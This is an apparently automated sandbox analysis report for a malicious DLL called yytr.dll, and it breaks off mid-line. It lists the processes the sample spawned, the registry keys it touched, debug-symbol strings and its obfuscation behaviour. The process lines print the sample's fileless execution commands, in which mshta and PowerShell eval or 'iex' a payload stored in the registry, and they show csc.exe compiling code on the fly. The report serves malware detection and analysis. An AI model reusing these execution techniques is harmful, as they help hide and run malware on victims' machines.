            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1
            Source: yytr.dllVirustotal: Detection: 43%
            Source: yytr.dllReversingLabs: Detection: 39%
            Source: loaddll32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\yytr.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1
            Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\explorer.exe Process created: unknown unknown
            Source: C:\Windows\System32\control.exe Process created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: powrprof.pdbG source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdb source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
            Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: version.pdb{ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdb} source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: combase.pdbQ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.845354069.000001CB4A4D0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.855076730.000002D3EE650000.00000002.00000001.sdmp
            Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdbM source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: mpr.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: setupapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdbe source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
            Source: Binary string: shcore.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: shell32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: oleaut32.pdbc source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdbXPS source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
            Source: Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
            Source: Binary string: bcrypt.pdb_ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: version.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wsspicli.pdbi source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc_os.pdbGX source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdbm source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdbXPS source: powershell.exe, 0000001E.00000002.910665056.0000026F5EC2E000.00000004.00000001.sdmp
            Source: Binary string: sechost.pdbw source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdbK source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdb source: powershell.exe, 0000001E.00000002.910375555.0000026F5EBB6000.00000004.00000001.sdmp
            Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.647057880.000000000316B000.00000004.00000001.sdmp
            Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
            Source: Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
            Source: Binary string: rundll32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp

            Data Obfuscation:

            Suspicious powershell command line found
            Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
            Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0042743C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042743C
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00453E60 push 00453EEDh; ret 0_2_00453EE5
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00406040 push 0040606Ch; ret 0_2_00406064
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004160F0 push ecx; mov dword ptr [esp], edx 0_2_004160F5
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00418174 push ecx; mov dword ptr [esp], ecx 0_2_00418179
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00414104 push 00414151h; ret 0_2_00414149
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00416134 push ecx; mov dword ptr [esp], edx 0_2_00416139
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004143CF push 004144A8h; ret 0_2_004144A0
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0041447C push 004144A8h; ret 0_2_004144A0
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00428404 push 0042845Dh; ret 0_2_00428455
            Source: C:\Windows\